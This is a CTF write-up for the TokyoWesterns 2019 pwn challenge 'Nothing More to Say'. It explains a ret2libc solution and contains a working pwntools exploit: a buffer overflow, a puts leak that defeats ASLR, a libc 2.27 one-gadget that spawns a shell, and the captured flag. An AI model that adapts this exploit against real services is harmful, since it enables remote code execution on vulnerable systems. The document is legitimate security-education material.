【TokyoWesterns CTF 5th 2019】Pwn--Nothing More to Say

This was probably an unintended solution…

Description:

Japan is fucking hot.

nc nothing.chal.ctf.westerns.tokyo 10001


Solution:

This challenge was meant to be solved with ret2shellcode, but I never managed to get it working (sigh, I'm a noob).

So I switched approaches and went with ret2libc. At first I used the LibcSearcher library to identify the libc,
but the libc 2.27 version it matched from the leak couldn't be used, and I don't know why.

So I just used the libc 2.27 that ships with Ubuntu 18.04.

Probably an unintended solution, hmm.


The exploit is as follows:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="amd64")
# p = process('./warmup')
p = remote('nothing.chal.ctf.westerns.tokyo', 10001)
elf = ELF('./warmup', checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)  # ubuntu 18.04 libc 2.27
addr_rdi_r = 0x0000000000400773  # pop rdi ; ret
addr_main = 0x00000000004006BA   # return to main so we can send a second payload
plt_puts = elf.plt['puts']
got_puts = elf.got['puts']

# Stage 1: overflow the buffer, call puts(got_puts) to leak the libc address of puts,
# then return to main.
pd = 'a' * 0x108
pd += p64(addr_rdi_r)
pd += p64(got_puts)
pd += p64(plt_puts)
pd += p64(addr_main)
p.sendlineafter('Please pwn me :)\n', pd)

# Discard the 0x10b bytes of output that precede the leaked pointer,
# then read the 6 significant bytes of the address and pad to 8.
p.recv(0x10b)
addr_puts = u64(p.recv(6).ljust(8, '\x00'))
print hex(addr_puts)
libcbase = addr_puts - libc.sym['puts']

# Stage 2: overflow again and return to a one-gadget in libc 2.27 (offset 0x4f2c5)
pd = 'a' * 0x108
pd += p64(libcbase + 0x4f2c5)
p.sendlineafter('Please pwn me :)\n', pd)
p.interactive()

Flag:

TWCTF{AAAATsumori---Shitureishimashita.}